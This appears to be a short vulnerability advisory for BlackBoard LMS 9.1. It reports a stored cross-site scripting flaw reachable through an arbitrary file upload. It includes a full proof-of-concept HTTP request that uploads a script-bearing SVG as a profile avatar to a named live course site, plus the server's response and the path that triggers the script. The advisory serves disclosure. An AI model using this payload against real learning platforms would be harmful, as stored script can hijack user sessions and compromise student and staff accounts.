BlackBoard LMS 9.1.140152.0 XSS / File Upload

BlackBoard LMS version 9.1.140152.0 suffers from a cross site scripting vulnerability that can be leveraged through an arbitrary file upload.


MD5 | 47c8d7b954b0a809a7d3aef677b80ea4

Document Title:
===============
BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File Upload


Product Description:
===============

The Learning Management System has changed the way students and
educators interact.

Blackboard's LMS solutions offer much more than simple, classroom interaction,

they support the entire education experience enabling educators to not
only interact,

but truly engage their students in learning.


Homepage: http://www.blackboard.com/learning-management-system/index.aspx


PoC:

===============


POST /webapps/Bb-sites-user-profile-BBLEARN/uploadAvatar.do HTTP/1.1

Host: www.coursesites.com


------WebKitFormBoundaryMB47ytMHFUAG9AAt
Content-Disposition: form-data; name="avatarFile"; filename="badsv2.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("ismail1337");
</script>
</svg>
------WebKitFormBoundaryMB47ytMHFUAG9AAt--


Response:


{"success":true,"message":"/bbcswebdav/users/your_user_id/public_html/badsv2.svg"}


Navigate to the returned URL path:

https://www.coursesites.com/bbcswebdav/users/your_user_id
/public_html/badsv2.svg



Related Posts